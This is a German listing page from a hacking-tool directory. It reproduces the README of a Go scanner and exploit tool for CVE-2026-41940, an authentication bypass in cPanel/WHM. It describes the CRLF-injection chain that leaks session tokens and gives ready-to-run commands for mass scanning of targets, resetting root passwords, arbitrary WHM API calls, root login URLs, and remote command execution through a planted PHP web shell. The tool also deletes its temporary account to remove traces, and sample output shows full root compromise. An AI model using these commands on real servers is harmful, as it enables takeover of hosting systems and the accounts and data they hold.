Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cPanelWHM-AuthBypass — Go-basierter Scanner und Exploit-Tool für CVE-2026-41940, eine Authentifizierungsumgehung in cPanel/WHM. Unterstützt Batch-Scanning, Token-Leakage und Post-Exploitation-Aktionen wie RCE, Passwortänderung und API-Aufrufe. | Kitploit
Tools/GitHubGitHub/kagantua/cpanelwhm-authbypass
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungRed Teaming
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Go-basierter Scanner und Exploit-Tool für CVE-2026-41940, eine Authentifizierungsumgehung in cPanel/WHM. Unterstützt Batch-Scanning, Token-Leakage und Post-Exploitation-Aktionen wie RCE, Passwortänderung und API-Aufrufe.

Repository anzeigen
10714vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

cPanel/WHM Auth Bypass Scanner & Exploit Tool

Ein in Go geschriebenes CLI-Tool, das auf dem Python-PoC von watchTowr basiert und zur Erkennung und Ausnutzung der CVE-2026-41940 cPanel/WHM-Authentifizierungs-Bypass-Schwachstelle dient.

Schwachstellenübersicht

CVE-2026-41940 ist eine Authentifizierungs-Bypass-Schwachstelle in cPanel/WHM. Die Angriffskette nutzt eine CRLF-Injektion in den Basic-Auth-Header, um Sicherheits-Tokens zu leaken und WHM-Root-Zugriff zu erlangen.

4-Phasen-Angriffskette:

  1. Pre-Auth — Senden falscher Anmeldedaten an /login/, um das rohe whostmgrsession-Cookie zu erhalten
  2. CRLF-Injektion — Einfügen von Zeilenumbrüchen über den Authorization: Basic-Header, um den Server dazu zu bringen, das cpsess-Sicherheits-Token im Location-Header der 307-Weiterleitung zu leaken
  3. Token-Weitergabe — Auslösen von do_token_denied, um die injizierten Authentifizierungsdaten vom Rohspeicher in den Cache zu übertragen
  4. Berechtigungsprüfung — Zugriff auf /json-api/version mit dem geleakten Token, um Root-Zugriff zu verifizieren

Funktionen

  • Batch-Scan — Massenprüfung von Zielen aus einer Datei, parallel ausgeführt
  • Einzelziel-Prüfung — Schnelle Verifizierung einer einzelnen URL
  • Intelligente URL-Verarbeitung — Automatische Kompatibilität mit http://, https://, protokollfreien Formaten, automatische Deduplizierung
  • Exploit
    • Root-Passwort ändern (-passwd)
    • Beliebige WHM-API aufrufen (-api)
    • Ein-Klick-Login-URL generieren (-session)
    • Remote-Befehlsausführung / RCE (-cmd)
  • Terminal-Hervorhebung — [VULN] rot, [SAFE] grün hervorgehoben
  • Ergebnis-Speicherung — Anfällige URLs werden automatisch in einer Datei gespeichert

Kompilierung

# Erfordert Go 1.20+
cd cpanel-checker
go build -o cpanel-checker .

Verwendung

Parameterübersicht

ParameterBeschreibungBeispiel
-uEinzelne Ziel-URL-u https://1.2.3.4:2087
-fDatei mit URL-Liste-f targets.txt
-oAusgabedateipfad (Standard result.txt)-o vuln.txt
-cParallelität (Standard 10)-c 20
-hostnameHost-Header manuell angeben (Standard: automatische Erkennung)-hostname cpanel.example.com
-passwdRoot-Passwort ändern (nur -u-Modus)-passwd NewP@ss123
-apiWHM-API-Funktion aufrufen (nur -u-Modus)-api listaccts
-api-paramsWHM-API-Parameter, kommagetrennt-api-params user=root,password=123
-sessionRoot-Ein-Klick-Login-URL generieren (nur -u-Modus)-session
-keepTemporäres RCE-Konto behalten (in Kombination mit -cmd)-keep
-cmdRemote-Befehl ausführen / RCE (nur -u-Modus)-cmd "id"

1. Einzelziel-Prüfung

./cpanel-checker -u https://target:2087

Der Standardport ist 2087, die folgenden Schreibweisen sind äquivalent:

./cpanel-checker -u https://target
./cpanel-checker -u target

2. Batch-Scan

./cpanel-checker -f targets.txt -c 20

targets.txt unterstützt die folgenden Formate (eine pro Zeile, # am Anfang ist ein Kommentar):

https://1.1.1.1:2087
http://2.2.2.2:2087
3.3.3.3:2087
4.4.4.4
# Dies ist ein Kommentar
  • Automatische Deduplizierung: http://1.1.1.1 und https://1.1.1.1 gelten als dasselbe Ziel und werden nur einmal gescannt
  • Adressen ohne Protokoll werden automatisch zu https:// ergänzt
  • Adressen ohne Port verwenden automatisch 2087
  • Ergebnisse werden in result.txt gespeichert (über -o anpassbar)

3. Root-Passwort ändern

./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"

4. Beliebige WHM-API aufrufen

# Alle Konten auflisten
./cpanel-checker -u https://target:2087 -api listaccts

# Mit Parametern aufrufen
./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"

5. Ein-Klick-Login-URL generieren

./cpanel-checker -u https://target:2087 -session

Gibt eine URL aus, die im Browser geöffnet werden kann, um direkt in das WHM-Verwaltungspanel zu gelangen. Über die Terminal-Funktion im Panel kann eine interaktive Root-Shell erhalten werden.

Hinweis: -session ist halbautomatisch — das Tool generiert die Login-URL, die du dann manuell im Browser öffnen musst.

6. Remote-Befehlsausführung (RCE)

./cpanel-checker -u https://target:2087 -cmd "id"

Mit -keep wird das temporäre Konto behalten, um sich im cPanel-Backend anzumelden:

./cpanel-checker -u https://target:2087 -cmd "id" -keep

Bei Verwendung von -keep enthält die Ausgabe Benutzername, Passwort und cPanel-Login-Adresse (https://host:2083) des temporären Kontos. Mit diesen Anmeldedaten kann man sich direkt im cPanel-Panel anmelden.

-cmd ist vollautomatisch und erfordert keine weiteren manuellen Schritte. Interner Ablauf:

  1. Authentifizierungs-Bypass ausnutzen, um Root-Zugriff zu erlangen
  2. Temporäres cPanel-Konto über die WHM-API erstellen
  3. PHP-Shell über UAPI (Fileman::save_file_content) in ~/public_html/ schreiben
  4. Befehl über HTTP unter https://host/~tmpuser/shell.php ausführen
  5. Befehlsausgabe zurückgeben
  6. Temporäres Konto automatisch löschen (Spuren beseitigen)

Voraussetzung: Port 80 oder 443 des Ziels muss erreichbar sein und Apache/httpd muss laufen.

7. Kombinierte Nutzung

Mehrere Exploit-Parameter können gleichzeitig verwendet werden:

# Login-URL erhalten, Befehl ausführen und Passwort ändern
./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"

8. Host-Header manuell angeben

Wenn die Ziel-IP nicht mit dem in cPanel konfigurierten Hostnamen übereinstimmt, kann dieser manuell angegeben werden:

./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com

Standardmäßig erkennt das Tool den korrekten Hostnamen automatisch über die 307-Weiterleitung von /openid_connect/cpanelid.

Beispielausgabe

Batch-Scan

[1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
[2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
[3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
[4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
[5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched

========== Scan abgeschlossen ==========
Gesamt: 5 | Anfällig: 2

  ● https://1.1.1.1:2087
  ● https://4.4.4.4:2087

[+] Ergebnisse wurden in result.txt gespeichert

RCE-Ausführung

[*] Ziel: https://target:2087
[*] Modus: Exploit

[0] hostname = cpanel.example.com
[1] minting a preauth session...
    session base = abc123def456
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    leaked token = /cpsess1234567890
[3] firing do_token_denied to propagate raw -> cache...
    gadget fired
[4] verifying we're WHM root...
[+] WHM-Root-Zugriff erlangt

[*] Remote-Befehl ausführen (RCE)...
    [a] Temporäres Konto erstellen: tmpabcde
    [b] Shell schreiben: /home/tmpabcde/public_html/random.php
    [c] Befehl ausführen: id
    [d] Temporäres Konto löschen: tmpabcde
[+] Befehlsausgabe:
uid=0(root) gid=0(root) groups=0(root)

[+] Fertig. https://target:2087 wurde kompromittiert

Hinweise

  • Exploit-Parameter (-passwd, -api, -session, -cmd) sind nur im -u-Einzelzielmodus verfügbar, nicht im -f-Batchmodus
  • Das Tool überspringt standardmäßig die TLS-Zertifikatsprüfung
  • Das Request-Timeout beträgt 15 Sekunden
  • Zeilen, die in der URL-Datei mit # beginnen, werden ignoriert

Haftungsausschluss

Tool herunterladen